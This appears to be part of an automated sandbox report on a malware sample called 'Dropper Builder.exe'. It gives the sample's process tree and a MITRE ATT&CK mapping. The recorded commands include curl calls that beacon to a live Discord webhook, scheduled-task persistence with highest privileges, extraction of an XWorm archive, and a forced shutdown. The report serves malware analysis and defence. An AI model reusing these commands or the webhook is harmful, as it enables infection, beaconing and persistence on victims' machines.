                                                                                                                                                                                                                                                      PID:7908
                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=12336 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:7984
                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=12468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:8068
                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=12816 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:8132
                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=12184 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:8168
                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2720 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • NTFS ADS
                                                                                                                                                                                                                                                              PID:8696
                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9296 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:8796
                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2744 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:8804
                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:8940
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\Dropper Builder.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\Dropper Builder.exe"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                    PID:9052
                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:9064
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:9124
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\curl.exe
                                                                                                                                                                                                                                                                            curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:9172
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                            PID:4608
                                                                                                                                                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                              PID:6588
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:5884
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe" x "C:\Windows\Resources\xworm fixed.zip" -o"C:\Windows\Resources\xworm fixed" -y
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                PID:6312
                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:2816
                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\shutdown.exe
                                                                                                                                                                                                                                                                                  shutdown.exe /f /s /t 0
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:7920
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                        PID:1056
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                    PID:7108
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:7312
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                          PID:7424
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7039.tmp.bat""
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:7340
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                              PID:8496
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                              timeout 3
                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                              PID:7432
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                          PID:6656
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          PID:7188
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.UnauthorizedAccessException: Access to the path 'C:\Users\Admin\Videos\thing' is denied. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.StreamWriter.CreateFile(String path, Boolean append, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding, Int32 bufferSize, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding) at Dropper.Dropping.Main()"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:8684
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:7440
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\curl.exe
                                                                                                                                                                                                                                                                                                curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.UnauthorizedAccessException: Access to the path 'C:\Users\Admin\Videos\thing' is denied.
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:8180
                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:8948
                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5984 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:2
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:8936
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:3420
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:3460
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:3876
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of UnmapMainImage
                                                                                                                                                                                                                                                                                                    PID:3936
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:3988
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:3996
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:4224
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:4420
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:3792
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:3580
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:576
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:1696
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:2776
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:956
                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                        PID:2320
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:3040
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:4208
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2780 -ip 2780
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:560
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:4024
                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:1788
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                  PID:1208
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:7900
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:7888
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:7096
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:8932
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:9176
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                            PID:4988
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:7380
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:3064
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7952

                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1547

                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1547

                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1547.001

                                                                                                                                                                                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1053.005

                                                                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  330B

